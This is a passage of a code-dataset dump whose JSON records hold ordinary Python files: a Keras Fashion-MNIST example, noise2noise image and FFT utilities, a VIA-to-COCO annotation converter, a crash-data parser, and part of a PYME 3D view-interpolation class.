tensorflow.python.keras.callbacks import TensorBoard\nfrom tensorflow import keras\n\n\n# Helper libraries\nimport numpy as np\n\n# SET BACKEND\nimport matplotlib as mpl\nmpl.use('TkAgg')\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n# print(tf.__version__)\n\n# Download the data\nfashion_mnist = keras.datasets.fashion_mnist\n\n# Load the values\n(train_images, train_labels), (test_images,\n                               test_labels) = fashion_mnist.load_data()\n\n# Define the classes\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n               'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\n# plt.figure()\n# plt.imshow(train_images[0])\n# plt.colorbar()\n# plt.grid(False)\n# plt.show()\n\n# Scale the values to the range 0-1\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n\n# plt.figure(figsize=(10, 10))\n# for i in range(25):\n#     plt.subplot(5, 5, i+1)\n#     plt.xticks([])\n#     plt.yticks([])\n#     plt.grid(False)\n#     plt.imshow(train_images[i], cmap=plt.cm.binary)\n#     plt.xlabel(class_names[train_labels[i]])\n# plt.show()\n\n\n# Build the model\nmodel = keras.Sequential([\n    # The first layer represents the 784 pixels\n    keras.layers.Flatten(input_shape=(28, 28)),\n    # This layer is made up of 128 neurons\n    keras.layers.Dense(128, activation=tf.nn.relu),\n    # Last layer, made up of 10 neurons, each one representing one of the classes;\n    # it returns an array of 10 probabilities, each one representing the\n    # probability of belonging to one of the classes; the highest one is the answer\n    keras.layers.Dense(10, activation=tf.nn.softmax)\n])\n\nmodel.compile(optimizer=tf.train.AdamOptimizer(),  # This describes how the model will be updated based on the loss function\n              # This defines how the outputs will be minimized\n              loss='sparse_categorical_crossentropy',\n              metrics=['accuracy'])  # The metric is based on the accuracy of each classification\n\ntensorboard = TensorBoard(\n    log_dir=\"logs/{}\", histogram_freq=0, write_graph=True, write_images=True)\n\n# 5 epochs\nmodel.fit(train_images, train_labels, epochs=5,\n          verbose=1, callbacks=[tensorboard])\n\n# Compute the accuracy against the correct data\ntest_loss, test_acc = model.evaluate(test_images, test_labels)\n\nprint('Test accuracy:', test_acc)\n\npredictions = model.predict(test_images)\n\n\ndef plot_image(i, predictions_array, true_label, img):\n    predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]\n    plt.grid(False)\n    plt.xticks([])\n    plt.yticks([])\n\n    plt.imshow(img, cmap=plt.cm.binary)\n\n    predicted_label = np.argmax(predictions_array)\n    if predicted_label == true_label:\n        color = 'blue'\n    else:\n        color = 'red'\n\n    plt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label],\n                                         100*np.max(predictions_array),\n                                         class_names[true_label]),\n               color=color)\n\n\ndef plot_value_array(i, predictions_array, true_label):\n    predictions_array, true_label = predictions_array[i], true_label[i]\n    plt.grid(False)\n    plt.xticks([])\n    plt.yticks([])\n    thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n    plt.ylim([0, 1])\n    predicted_label = np.argmax(predictions_array)\n\n    thisplot[predicted_label].set_color('red')\n    thisplot[true_label].set_color('blue')\n\n\n# i = 0\n# plt.figure(figsize=(6, 3))\n# plt.subplot(1, 2, 1)\n# plot_image(i, predictions, test_labels, test_images)\n# plt.subplot(1, 2, 2)\n# plot_value_array(i, predictions, test_labels)\n# plt.show()\n\n\n# Plot the first X test images, their 
predicted label, and the true label\n# Color correct predictions in blue, incorrect predictions in red\n# num_rows = 5\n# num_cols = 3\n# num_images = num_rows*num_cols\n# plt.figure(figsize=(2*2*num_cols, 2*num_rows))\n# for i in range(num_images):\n# plt.subplot(num_rows, 2*num_cols, 2*i+1)\n# plot_image(i, predictions, test_labels, test_images)\n# plt.subplot(num_rows, 2*num_cols, 2*i+2)\n# plot_value_array(i, predictions, test_labels)\n# plt.show()\n\n\n# Grab an image from the test dataset\nimg = test_images[0]\n\nprint(img.shape)\n\n# Add the image to a batch where it's the only member.\nimg = (np.expand_dims(img, 0))\n\nprint(img.shape)\n\npredictions_single = model.predict(img)\n\nprint(predictions_single)\n\nplot_value_array(0, predictions_single, test_labels)\n_ = plt.xticks(range(10), class_names, rotation=45)\n\nnp.argmax(predictions_single[0])\n\nplt.show()\n", "repo_name": "Santiago-vdk/TensorFlowEjemplo", "sub_path": "ejemplo.py", "file_name": "ejemplo.py", "file_ext": "py", "file_size_in_byte": 4734, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "matplotlib.use", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.keras.datasets", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 21, "usage_type": "name"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 53, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 55, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 57, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 57, "usage_type": "name"}, {"api_name": "tensorflow.nn", "line_number": 57, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 61, "usage_type": "name"}, {"api_name": "tensorflow.nn", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tensorflow.python.keras.callbacks.TensorBoard", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 90, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 92, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot.xlabel", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}]} +{"seq_id": "4854571235", "text": "# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.\r\n#\r\n# This work is licensed under the Creative Commons Attribution-NonCommercial\r\n# 4.0 International License. To view a copy of this license, visit\r\n# http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to\r\n# Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.\r\n\r\nimport os\r\nimport numpy as np\r\nimport pickle\r\nimport PIL.Image\r\nimport scipy.fft as fftpack\r\nimport ipdb\r\n\r\nimport dnnlib.submission.submit as submit\r\n\r\n# save_pkl, load_pkl are used by the mri code to save datasets\r\ndef save_pkl(obj, filename):\r\n with open(filename, 'wb') as file:\r\n pickle.dump(obj, file, protocol=pickle.HIGHEST_PROTOCOL)\r\n\r\ndef load_pkl(filename):\r\n with open(filename, 'rb') as file:\r\n return pickle.load(file)\r\n\r\n# save_snapshot, load_snapshot are used save/restore trained networks\r\ndef save_snapshot(submit_config, net, fname_postfix):\r\n dump_fname = os.path.join(submit_config.run_dir, \"network_%s.pickle\" % fname_postfix)\r\n with open(dump_fname, \"wb\") as f:\r\n pickle.dump(net, f)\r\n\r\ndef load_snapshot(fname):\r\n fname = os.path.join(submit.get_path_from_template(fname))\r\n with open(fname, \"rb\") as f:\r\n return pickle.load(f)\r\n\r\n\r\ndef invert_fft_re_im(img):\r\n ft = img\r\n\r\n img_real = ft[:, :, :ft.shape[2]//2]\r\n img_imag = ft[:, :, ft.shape[2]//2:]\r\n\r\n ft = img_real + 1j*img_imag\r\n #ft = np.exp(ft)\r\n\r\n real_img = fftpack.irfft2(ft, s=[ft.shape[1], ft.shape[2]*2])\r\n return real_img\r\n\r\ndef invert_fft_abs_ang(img):\r\n ft = img\r\n\r\n #img_abs = ft[:3, :, :]\r\n #img_ang = ft[3:, :, :] <-------- Color\r\n img_abs = ft[0, :, :]\r\n img_ang = ft[1, :, :]\r\n\r\n\r\n ft = img_abs * np.exp(1j*img_ang) \r\n #ft = np.exp(ft)\r\n ft = ft[None, :, :]\r\n\r\n real_img = fftpack.irfft2(ft, s=[ft.shape[1], ft.shape[2]*2])\r\n return real_img\r\n\r\ndef loop_fft(img, dir = 1):\r\n ft = 
fftpack.rfft2(img)\r\n #if dir == 1:\r\n # ft = np.exp(ft)\r\n #else:\r\n # ft = np.log(ft)\r\n out = fftpack.irfft2(ft)\r\n return out\r\n\r\ndef save_image(submit_config, img_t, filename):\r\n #img_t = invert_fft_abs_ang(img_t)\r\n #img_t = loop_fft(img_t)\r\n img_t = clip_to_uint8(img_t)\r\n t = img_t.transpose([1, 2, 0]) # [RGB, H, W] -> [H, W, RGB]\r\n if t.dtype in [np.float32, np.float64]:\r\n t = clip_to_uint8(t)\r\n else:\r\n assert t.dtype == np.uint8\r\n #PIL.Image.fromarray(t, 'RGB').save(os.path.join(submit_config.run_dir, filename)) #<--------- Color\r\n PIL.Image.fromarray(t.squeeze(), 'L').save(os.path.join(submit_config.run_dir, filename)) # <-------- B/W\r\n '''\r\n filename = os.path.join(submit_config.run_dir, filename)\r\n output = open(filename, 'wb')\r\n pickle.dump(img_t, output)\r\n output.close()\r\n '''\r\n \r\ndef save_clean_image(submit_config, img_t, filename):\r\n t = img_t.transpose([1, 2, 0]) # [RGB, H, W] -> [H, W, RGB]\r\n if t.dtype in [np.float32, np.float64]:\r\n t = clip_to_uint8(t)\r\n else:\r\n assert t.dtype == np.uint8\r\n #PIL.Image.fromarray(t, 'RGB').save(os.path.join(submit_config.run_dir, filename)) # <--------- Color\r\n PIL.Image.fromarray(t.squeeze(), 'L').save(os.path.join(submit_config.run_dir, filename)) # <-------- B/W\r\n\r\ndef clip_to_uint8(arr):\r\n return np.clip((arr + 0.5) * 255.0 + 0.5, 0, 255).astype(np.uint8)\r\n\r\ndef crop_np(img, x, y, w, h):\r\n return img[:, y:h, x:w]\r\n\r\n# Run an image through the network (apply reflect padding when needed\r\n# and crop back to original dimensions.)\r\ndef infer_image(net, img):\r\n #ipdb.set_trace()\r\n w = img.shape[2]\r\n h = img.shape[1]\r\n pw, ph = (w+31)//32*32-w, (h+31)//32*32-h\r\n padded_img = img\r\n if pw!=0 or ph!=0:\r\n padded_img = np.pad(img, ((0,0),(0,ph),(0,pw)), 'reflect')\r\n #inferred = net.run(np.expand_dims(padded_img, axis=0), width=(w+pw)*2, height=h+ph)\r\n inferred = net.run(np.expand_dims(padded_img, axis=0), width=(w+pw), height=h+ph) \r\n #return clip_to_uint8(crop_np(inferred[0], 0, 0, w, h))\r\n return crop_np(inferred[0], 0, 0, w, h)\r\n #return crop_np(inferred[0], 0, 0, w, h)\r\n\r\ndef create_circle(shape, radius):\r\n #ipdb.set_trace()\r\n out = np.ones(shape)\r\n for i in range(-radius, radius+1):\r\n for j in range(-radius, radius+1):\r\n if i**2 + j**2 <= radius**2:\r\n out[:, i, j] = 0\r\n return out\r\n\r\ndef remove_DC(img, rad):\r\n ft = fftpack.rfft2(img)\r\n low_pass = create_circle(ft.shape, rad)\r\n ft = ft * low_pass\r\n return fftpack.irfft2(ft, s = [img.shape[1], img.shape[2]])\r\n\r\ndef restore_DC(orig_img, img, rad):\r\n #ipdb.set_trace()\r\n orig_ft = fftpack.rfft2(orig_img)\r\n ft = fftpack.rfft2(img)\r\n low_pass = create_circle(ft.shape, rad)\r\n return fftpack.irfft2(ft + (1 - low_pass) * orig_ft, s = [img.shape[1], img.shape[2]])\r\n\r\n", "repo_name": "MegiDervishi/debluring_n2n", "sub_path": "noise2noise/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 4855, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pickle.dump", "line_number": 20, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 30, "usage_type": 
"call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "dnnlib.submission.submit.get_path_from_template", "line_number": 33, "usage_type": "call"}, {"api_name": "dnnlib.submission.submit", "line_number": 33, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 35, "usage_type": "call"}, {"api_name": "scipy.fft.irfft2", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 59, "usage_type": "call"}, {"api_name": "scipy.fft.irfft2", "line_number": 63, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 63, "usage_type": "name"}, {"api_name": "scipy.fft.rfft2", "line_number": 67, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 67, "usage_type": "name"}, {"api_name": "scipy.fft.irfft2", "line_number": 72, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 72, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 80, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 80, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 83, "usage_type": "attribute"}, {"api_name": "PIL.Image.Image.fromarray", "line_number": 85, "usage_type": "call"}, {"api_name": "PIL.Image.Image", "line_number": 85, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 85, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 98, "usage_type": "attribute"}, {"api_name": "PIL.Image.Image.fromarray", "line_number": 100, "usage_type": "call"}, {"api_name": "PIL.Image.Image", "line_number": 100, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 100, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 103, "usage_type": "attribute"}, {"api_name": "numpy.pad", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 126, "usage_type": "call"}, {"api_name": "scipy.fft.rfft2", "line_number": 134, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 134, "usage_type": "name"}, {"api_name": "scipy.fft.irfft2", "line_number": 137, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 137, "usage_type": "name"}, {"api_name": "scipy.fft.rfft2", "line_number": 141, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 141, "usage_type": "name"}, {"api_name": "scipy.fft.rfft2", "line_number": 142, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 142, "usage_type": "name"}, {"api_name": "scipy.fft.irfft2", "line_number": 144, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 144, "usage_type": "name"}]} +{"seq_id": "32021906221", "text": "# _*_ coding:utf-8 _*_\n# Editor: ly\n# Time: 2021/1/8上午10:43\n# Filename: AIR_jsoner.py\n# IDE: PyCharm\n\nimport json\nimport tqdm\n\n# 源文件\npath_json = 
'/home/ly/Dataset/AIR/annotations/train_ori/pro_version_train.json'\npath_coco = '/home/ly/Dataset/AIR/annotations/train_ori/coco_version_train.json'\nsave = 'train_v1.json'\n\n# Open the source files\nfile_pro = open(path_json, 'r')\nfile_coco = open(path_coco, 'r')\n\n'''Processing of the keypoint (KPT) information'''\npro_all = json.load(file_pro)\n\n# Get the number of images:\nsample_list_size = len(pro_all['_via_img_metadata'])\n\n# Get the image names:\nsample_name = list(pro_all['_via_img_metadata'].keys())\n\n# Get the keypoint label dictionary\n# (the mask and box labels are removed from it)\nsample_cat = pro_all['_via_attributes']['region']['plane']['options']\n# cat_table = list(sample_cat.keys())[:-2]\ncat_table = list(sample_cat.keys())[:-1]\n\n'''Mapping between the keypoint info and the keypoint table'''\n# Keypoint j of an image i is located at: ['meta'][i]['regions'][j],\n# its details are at: ['regions'][j]['shape_attr']['cx/cy']\n# its label is at: ['regions'][j]['region_attr']['plane']\n'''Since the data also contains mask and box info, it has to be filtered out via cat_table'''\n# Or just convert ['region_attr']['plane'] to an integer directly?\n\n# samp_id: index of the image name in the metadata list\n\n# Build the keypoint storage array\nJOINT_NUM = 9\nsample_KPT = [0] * sample_list_size\nfor samp_id in range(sample_list_size):\n    sample_KPT[samp_id] = {}\n    sample_KPT[samp_id]['kpt'] = [0] * (JOINT_NUM * 3)\n    sample_KPT[samp_id]['num'] = 0\n\n# Iterate over the images in via_pro and build the kpt dicts\nfor samp_id in range(sample_list_size):\n    # if samp_id == 174 or samp_id == 410 or samp_id == 414 or samp_id == 545 or samp_id == 588 or samp_id == 821:\n    #     continue\n    # Extract the id from the name; image id = label id = int of the name\n    img_name_id = int(sample_name[samp_id][:12])\n\n    # Get the keypoint annotations of the image {a list}\n    ori_kpt_list = pro_all['_via_img_metadata'][sample_name[samp_id]]['regions']\n    cnt = 0\n    # print(\"empty-point debug...:\")\n    # print(img_name_id)\n    # print(\"\\n\")\n    # Iterate over the points\n    for i in range(len(ori_kpt_list)):\n        # Get the category id of the i-th keypoint, in order to drop the MASK and BOX info from the raw data\n        cati = ori_kpt_list[i]['region_attributes']['plane']\n\n        # Search the keypoint category table for the category of the i-th point\n        tmp = [j for j in cat_table if j in cati]\n        if len(tmp) == 1:\n            kpt_id = int(cati)\n\n            sample_KPT[img_name_id]['kpt'][kpt_id * 3] = ori_kpt_list[i]['shape_attributes']['cx']\n            sample_KPT[img_name_id]['kpt'][kpt_id * 3 + 1] = ori_kpt_list[i]['shape_attributes']['cy']\n            sample_KPT[img_name_id]['kpt'][kpt_id * 3 + 2] = 2\n            cnt = cnt + 1\n\n    # Save the number of keypoints in the image\n    sample_KPT[img_name_id]['num'] = cnt\n\n'''At this point, the kpt and num_kpt parts are fully extracted'''\n\n'''Processing of the mask, box and area information'''\njson_coco = json.load(file_coco)\ncoco_WH = json_coco['images']\ncoco_SAB = json_coco['annotations']\n\n# sample_SAB = [0] * (len(coco_SAB) // 2)\n# for samp_id in range(len(coco_SAB) // 2):\nsample_SAB = [0] * (len(coco_SAB))\nfor samp_id in range(len(coco_SAB)):\n    sample_SAB[samp_id] = {}\n    sample_SAB[samp_id]['seg'] = []\n    sample_SAB[samp_id]['area'] = 0\n    sample_SAB[samp_id]['bbox'] = 0\nfor i in range(len(coco_SAB)):\n    real_img_id = int(coco_SAB[i]['image_id'])\n    if coco_SAB[i]['category_id'] == 10:\n        sample_SAB[real_img_id]['seg'].append(coco_SAB[i]['segmentation'])\n        sample_SAB[real_img_id]['area'] += coco_SAB[i]['area']\n        sample_SAB[real_img_id]['bbox'] = coco_SAB[i]['bbox']\n\n'''Processing of the width and height'''\nsample_WH = [0] * (len(coco_WH))\nfor samp_id in range(len(coco_WH)):\n    sample_WH[samp_id] = {}\n    sample_WH[samp_id]['width'] = 0\n    sample_WH[samp_id]['height'] = 0\nfor img in coco_WH:\n    sample_WH[img['id']]['width'] = img['width']\n    sample_WH[img['id']]['height'] = img['height']\n\n'''Generating the coco.json file'''\n# sample_SAB\n# sample_KPT\n# the list id is:\nprint(\"writing...\\n\")\ninfo = '{\"info\":{\"year\":2020,\"version\":\"1\",\"description\":\"Airplane Dataset(imitated COCO2017)\",\"contributor\":\"Annotation tools: VIA, Resource web: VJshi, Scholiast: 
IOE_lab5_ly\",\"url\":\"https://github.com/Maushawkin/\",\"date_created\":\"Wed Dec 25 2020 00:00:01 GMT+0800\"},\"images\":['\nz = open(save, 'a+')\nz.write(info)\nz.close()\n\n'''writing images'''\nfor i in tqdm.tqdm(range(sample_list_size)):\n '''require two parameters:[id, name, width, height]'''\n temp_id = int(sample_name[i][0:12])\n img_par = [temp_id, sample_name[i][0:16], sample_WH[temp_id]['width'], sample_WH[temp_id]['height']]\n buff_img = '{{\"id\":{0[0]},\"width\":{0[2]},\"height\":{0[3]},\"file_name\":\"{0[1]}\",\"license\":0,\"date_captured\":\"2020-12-25 00:00:00\"}},' \\\n .format(img_par)\n if i == sample_list_size - 1:\n buff_img = '{{\"id\":{0[0]},\"width\":{0[2]},\"height\":{0[3]},\"file_name\":\"{0[1]}\",\"license\":0,\"date_captured\":\"2020-12-25 00:00:00\"}}],\"annotations\":[' \\\n .format(img_par)\n z = open(save, 'a+')\n z.write(buff_img)\n z.close()\n # core = {\"current\": i, \"total\": sample_list_size}\n # print('{current}/{total}'.format(**core))\n\n'''writing annotations'''\nfor i in tqdm.tqdm(range(sample_list_size)):\n seg = sample_SAB[i]['seg']\n area = sample_SAB[i]['area']\n bbox = sample_SAB[i]['bbox']\n kpt = sample_KPT[i]['kpt']\n num_kpt = sample_KPT[i]['num']\n ann_par = [seg, num_kpt, area, kpt, i, bbox, i]\n buff_ann = '{{\"segmentation\":{0[0]},\"num_keypoints\":{0[1]},\"area\":{0[2]},\"iscrowd\":0,\"keypoints\":{0[3]},\"image_id\":{0[4]},\"bbox\":{0[5]},\"category_id\":1,\"id\":{0[6]}}},' \\\n .format(ann_par)\n if i == sample_list_size - 1:\n buff_ann = '{{\"segmentation\":{0[0]},\"num_keypoints\":{0[1]},\"area\":{0[2]},\"iscrowd\":0,\"keypoints\":{0[3]},\"image_id\":{0[4]},\"bbox\":{0[5]},\"category_id\":1,\"id\":{0[6]}}}],' \\\n .format(ann_par)\n z = open(save, 'a+')\n z.write(buff_ann)\n z.close()\n\n'''writing others'''\nothers = '\"licenses\":[{\"id\":0,\"name\":\"Vjshi\",\"url\":\"https://www.vjshi.com/\"}],\"categories\":[{\"id\":1,\"name\":\"plane\",\"supercategory\":\"plane\",\"keypoints\":[\"head\",\"lshdr\",\"rshdr\",\"lwing\",\"rwing\",\"tail\",\"uptail\",\"ltail\",\"rtail\"],\"skeleton\":[[0,1],[0,2],[0,5],[1,2],[1,3],[2,4],[5,6],[5,7],[5,8],[7,8]]}]}'\nz = open(save, 'a+')\nz.write(others)\nz.close()\nprint('done\\n')\n", "repo_name": "MauShawKin/AIR_PE", "sub_path": "making_annotations/via2coco.py", "file_name": "via2coco.py", "file_ext": "py", "file_size_in_byte": 6435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "json.load", "line_number": 20, "usage_type": "call"}, {"api_name": "json.load", "line_number": 85, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 125, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "25811274652", "text": "import simplejson\n\n\ndef read_parse_crash():\n lat = list()\n lng = list()\n with open('dataset/crashes/Motor_Vehicle_Collisions_-_Crashes.csv', 'r') as data:\n data.readline().split(',')\n lines = data.readlines()\n for line in lines:\n line = line.strip().split(\",\")\n if line[0][0] == \"1\" or line[0][0] == \"0\":\n if line[0].split('/')[2] == \"2020\" and line[4] != \"\":\n lat.append(float(line[4]))\n lng.append(float(line[5]))\n\n with open('dataset/crashes/crashes_latitude.txt', 'w') as f:\n simplejson.dump(lat, f)\n f.close()\n with open('dataset/crashes/crashes_longitude.txt', 'w') as f:\n simplejson.dump(lng, f)\n f.close()\n\n\nif __name__ == \"__main__\":\n read_parse_crash()\n", "repo_name": "Melnikovartem/sbuhack_2020", 
"sub_path": "parse_crash.py", "file_name": "parse_crash.py", "file_ext": "py", "file_size_in_byte": 805, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "simplejson.dump", "line_number": 18, "usage_type": "call"}, {"api_name": "simplejson.dump", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "74683187004", "text": "import json\nfrom collections import OrderedDict\n\nimport numpy as np\nfrom scipy.spatial.transform import Rotation, Slerp\n\nimport PYME\nfrom enum import Enum\n\nclipping_dtype = [('x', '= len(canvas.layers):\n print(\"Not enough layers. Need to add more layers manually to be able to load settings.\")\n break\n if fast:\n # These are both 'fast' changes. Points are not recalculated. Works because render engine reads from them every frame.\n if ~np.allclose(layer[\"alpha\"], canvas.layers[i].get_colors()[0, 3]):\n #crude check to see if alpha is different from current\n canvas.layers[i]._colors[:, 3] = layer[\"alpha\"]\n canvas.layers[i].trait_set(trait_change_notify=False, **{'point_size':layer[\"point_size\"]})\n else:\n canvas.layers[i].trait_set(trait_change_notify=True, **{'alpha':layer[\"alpha\"], 'point_size':layer[\"point_size\"]})\n canvas.GrandParent.Parent.Refresh()\n \n def lerp(self, other, t):\n # Should be vectorized so that t can be list-like item\n # Low priority while frames < 1000?\n if t<=0:\n return View.copy(self)\n elif t>=1:\n return View.copy(other)\n else:\n# print(self.rotation)\n# print(other.rotation)\n# t = np.atleast_1d(t)\n rotations = Rotation.from_dcm([[self.vec_up, self.vec_back, self.vec_right], [other.vec_up, other.vec_back, other.vec_right]])\n\n\n interp_rotations = Slerp([0.0, 1.0], rotations)([t]).as_dcm()[0]\n interp_translation = (1-t) * self.translation + t * other.translation\n interp_scale = (1-t) * self.scale + t * other.scale\n interp_clipping = ((1-t) * self.clipping.view('8f4') + t * other.clipping.view('8f4')).view(clipping_dtype)[0]\n\n interp_clip_plane_orientation = Slerp([0.0, 1.0], Rotation.from_quat([self._clip_plane_orientation.as_quat(), other._clip_plane_orientation.as_quat()]))([t]).as_quat()[0]\n interp_clip_plane_position = (1-t) * self.clip_plane_position + t * other.clip_plane_position\n \n binary_interp = t < 0.5\n interp_lut_draw = self.lut_draw if binary_interp else other.lut_draw\n interp_scale_bar = self.scale_bar if binary_interp else other.scale_bar\n interp_axes_visible = self.axes_visible if binary_interp else other.axes_visible\n \n interp_background_color = (1-t) * self.background_color + t * other.background_color\n \n interp_layer0_alpha = (1-t) * self.layer0_alpha + t * other.layer0_alpha\n interp_layer0_point_size = (1-t) * self.layer0_point_size + t * other.layer0_point_size\n \n return View(None,\n interp_rotations[0],\n interp_rotations[1],\n interp_rotations[2],\n interp_translation,\n interp_scale,\n interp_clipping,\n interp_clip_plane_orientation,\n interp_clip_plane_position,\n interp_lut_draw,\n interp_scale_bar,\n interp_background_color,\n interp_axes_visible,\n interp_layer0_alpha,\n interp_layer0_point_size,\n )\n \n @classmethod\n def rotate(cls, view, axis, degree):\n current_rotation = Rotation.from_dcm([view.vec_up, view.vec_back, view.vec_right])\n new_rotation = np.zeros(3, np.float)\n new_rotation[axis] = np.deg2rad(degree)\n combined_rotation = current_rotation * Rotation.from_rotvec(new_rotation)\n combined_rotation_dcm = combined_rotation.as_dcm()\n view.vec_up = 
